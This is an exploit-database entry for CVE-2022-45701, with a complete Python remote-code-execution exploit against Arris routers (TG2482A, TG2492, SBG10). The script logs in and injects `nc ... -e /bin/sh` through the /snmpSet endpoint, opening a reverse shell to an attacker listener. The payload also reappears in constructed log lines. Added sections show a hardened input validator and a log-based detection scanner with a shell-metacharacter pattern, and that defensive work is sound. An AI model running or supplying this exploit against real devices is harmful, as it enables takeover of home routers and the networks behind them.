1337DAY-ID-38202
Yerodin Richards
Feb 15, 2023 - 12:00 a.m.

Arris Router Firmware 9.1.103 Remote Code Execution Exploit

2023-02-15 00:00:00
Yerodin Richards
0day.today
Tags: arris router, firmware 9.1.103, remote code execution, authenticated, commscope, cve-2022-45701, tg2482a, tg2492, sbg10, exploit, base64, cookie, payload, network configuration, shell access

CVSS3: 8.8 High
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

AI Score: 9.2 High (Confidence: High)
EPSS: 0.027 Low (Percentile: 90.5%)

Arris router firmware 9.1.103 authenticated remote code execution exploit (CVE-2022-45701), tested against the TG2482A, TG2492, and SBG10 models. The exploit logs in to the router's web interface with valid credentials, then uses the /snmpSet endpoint to write a shell command substitution (`$(nc <lhost> <lport> -e /bin/sh)`) into an object under the ARRIS enterprise SNMP subtree and triggers it, which spawns a reverse shell to the attacker's listener. The bug is therefore an OS command injection reachable by any authenticated web user, not a memory-corruption issue.
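The injection works because the string written to the 1.3.6.1.4.1.4115.1.20.1.1.7.2.0 object is handed to a shell, where `$( ... )` is command substitution. The following is an added example, not code from the exploit author or from CommScope: it parses the `oid=value;type;` argument exactly as the exploit sends it, shows the vulnerable interpolation pattern next to the server-side check that closes it (validate the value as an IP literal or hostname, then exec without a shell). The `diag_tool` command name and the assumption that the object holds a host or target string are hypothetical; the sample inputs are constructed.

```python
import ipaddress
import re
import shlex
from urllib.parse import unquote

# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens,
# 253 characters at most. Anything a shell cares about ($ ( ) ` ; | & space) fails this.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def parse_snmpset_arg(raw):
    """Split the /snmpSet 'oid=value;type;' argument (URL-decoded first) into
    (oid, value, smi_type). Only the first '=' separates OID from value, so a
    value that itself contains '=' survives intact."""
    oid, sep, rest = unquote(raw).partition("=")
    if not sep:
        raise ValueError("missing '=' between OID and value")
    parts = rest.split(";")
    if len(parts) < 2 or not parts[1].isdigit():
        raise ValueError("missing or non-numeric ';type;' suffix")
    return oid, parts[0], int(parts[1])


def vulnerable_shell_string(target):
    """The pattern the exploit abuses: untrusted text concatenated into a shell
    command line. Hypothetical command; the string is returned, never run."""
    return "diag_tool " + target


def validated_target(value):
    """Allow-list check: an IPv4/IPv6 literal or an RFC 1123 hostname, nothing else."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError(f"rejected target value: {value!r}")


def is_safe_target(value):
    """Boolean wrapper around validated_target() for callers that only need yes/no."""
    try:
        validated_target(value)
        return True
    except ValueError:
        return False


def hardened_argv(target):
    """Build an argv list for exec without a shell. Validation rejects the
    metacharacters, and even if it did not, argv elements are never parsed
    by a shell, so $( ), backticks and ';' would be plain bytes here."""
    return ["diag_tool", validated_target(target)]


def hardened_shell_string(target):
    """If a shell really cannot be avoided: validate first, then quote.
    Quoting alone is defence in depth, not a substitute for the allow-list."""
    return "diag_tool " + shlex.quote(validated_target(target))
```

Running the exploit's own value through `parse_snmpset_arg` yields `$\(nc 192.168.0.6 80 -e /bin/sh)` with type 4 (OCTET STRING); `is_safe_target` rejects it, while `192.168.0.6` and `example.com` pass and produce a two-element argv.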

# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.commscope.com/
# Version: 9.1.103
# Tested on: TG2482A, TG2492, SBG10
# CVE : CVE-2022-45701

import base64
import sys

import requests

router_host = "http://192.168.0.1"  # router web interface (plain HTTP)
username = "admin"
password = "password"

lhost = "192.168.0.6"  # listener that will receive the reverse shell (nc -lvp 80)
lport = 80

TIMEOUT = 10  # seconds per request; an unreachable router should fail, not hang


def main():
    print("Authorizing...")
    cookie = get_cookie(gen_header(username, password))
    if cookie == '':
        print("Failed to authorize")
        sys.exit(1)
    print("Generating Payload...")
    payload = gen_payload(lhost, lport)
    print("Sending Payload...")
    send_payload(payload, cookie)
    print("Done, check shell..")


def gen_header(u, p):
    # /login takes HTTP-Basic-style base64("user:password") in the query string.
    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")


def no_encode_params(params):
    # Build the query string by hand so requests does not percent-encode the
    # characters ($ ( ) ; /) that the router must receive verbatim.
    return "&".join("%s=%s" % (k, v) for k, v in params.items())


def get_cookie(header):
    # The response body is the session credential that later requests present
    # as the "credential" cookie; an empty body means the login was rejected.
    url = router_host + "/login"
    params = no_encode_params({"arg": header, "_n": 1})
    resp = requests.get(url, params=params, timeout=TIMEOUT)
    return resp.content.decode('UTF-8')


def set_oid(oid, cookie):
    # /snmpSet writes a single object given as "oid=value;type;" where type is
    # the SMI tag number (2 = INTEGER, 4 = OCTET STRING, 66 = Gauge32).
    url = router_host + "/snmpSet"
    params = no_encode_params({"oid": oid, "_n": 1})
    cookies = {"credential": cookie}
    requests.get(url, params=params, cookies=cookies, timeout=TIMEOUT)


def gen_payload(h, p):
    # Shell command substitution that connects back with a shell. The value is
    # sent as "$\(nc ... )" exactly as in the original exploit; the backslash is
    # written as an explicit escape so Python does not warn about "\(".
    # Spaces are pre-encoded as %20 because no_encode_params() sends the
    # string untouched.
    return f"$\\(nc%20{h}%20{p}%20-e%20/bin/sh)"


def send_payload(payload, cookie):
    # All objects are under the ARRIS enterprise subtree (1.3.6.1.4.1.4115).
    # The .7.2.0 string carries the injected command; the surrounding integer
    # and gauge writes configure the operation and .7.9.0 starts it.
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)
    set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)


if __name__ == '__main__':
    main()
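On the defensive side, the exploit leaves a recognisable trail: a GET /login with base64 credentials in the query string, followed by GET /snmpSet writes under 1.3.6.1.4.1.4115.1.20.1.1.7 whose value contains shell metacharacters. The scanner below is an added example, not part of the original post or of any vendor tooling. It assumes that the router, or a proxy in front of it, records request lines in Common Log Format; the log lines are constructed here and replay the requests the exploit makes, plus two benign ones.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed access-log lines in Common Log Format. Lines 1-3 are what the
# exploit above produces; lines 4-5 are a legitimate write and an unrelated hit.
LOG_LINES = [
    '192.168.0.6 - - [15/Feb/2023:00:00:01 +0000] "GET /login?arg=YWRtaW46cGFzc3dvcmQ=&_n=1 HTTP/1.1" 200 32',
    '192.168.0.6 - - [15/Feb/2023:00:00:02 +0000] "GET /snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;&_n=1 HTTP/1.1" 200 12',
    '192.168.0.6 - - [15/Feb/2023:00:00:03 +0000] "GET /snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.7.2.0=$\\(nc%20192.168.0.6%2080%20-e%20/bin/sh);4;&_n=1 HTTP/1.1" 200 12',
    '192.168.0.10 - - [15/Feb/2023:00:05:00 +0000] "GET /snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.7.2.0=8.8.8.8;4;&_n=1 HTTP/1.1" 200 12',
    '192.168.0.10 - - [15/Feb/2023:00:06:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
VULN_SUBTREE = "1.3.6.1.4.1.4115.1.20.1.1.7."
# Command substitution "$(" (the exploit actually sends "$\("), backticks,
# "${", and the pipe / separator characters a shell would act on.
SHELL_META = re.compile(r"\$\\?\(|`|\$\{|[|;&]")


def query_param(query, name):
    """Extract one parameter by hand: parse_qs on older Pythons also splits on
    ';', which the router's 'value;type;' encoding uses inside the oid value."""
    m = re.search(r"(?:^|&)" + re.escape(name) + r"=([^&]*)", query)
    return unquote(m.group(1)) if m else None


def inspect_request(src, target):
    """Classify one request target. Returns a finding tuple or None."""
    path, _, query = target.partition("?")
    if path == "/login":
        arg = query_param(query, "arg") or ""
        try:  # the credential is base64("user:password"); keep only the user name
            user = base64.b64decode(arg, validate=True).decode("ascii").split(":", 1)[0]
        except (binascii.Error, UnicodeDecodeError):
            user = None
        return ("login", src, user)
    if path == "/snmpSet":
        raw = query_param(query, "oid") or ""
        oid, _, rest = raw.partition("=")
        value = rest.split(";")[0]
        if oid.startswith(VULN_SUBTREE) and SHELL_META.search(value):
            return ("rce_attempt", src, oid, value)
        return ("snmpset", src, oid)
    return None


def scan(lines):
    """Run inspect_request over every parseable log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = inspect_request(m["src"], m["target"])
        if finding:
            findings.append(finding)
    return findings


def attribute(findings):
    """Map each source that attempted injection to the account it logged in
    with earlier in the log (None if no login from that source was seen)."""
    last_login = {}
    attackers = {}
    for f in findings:
        if f[0] == "login":
            last_login[f[1]] = f[2]
        elif f[0] == "rce_attempt":
            attackers[f[1]] = last_login.get(f[1])
    return attackers
```

Against the constructed lines, `scan` reports the admin login, the harmless integer write, the injection attempt from 192.168.0.6, and the benign string write from 192.168.0.10; `attribute` ties the attempt to the `admin` account, which is the first question an incident responder asks about an authenticated exploit. Note the login finding also shows that credentials travel in a GET query string over plain HTTP and end up in any access log.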
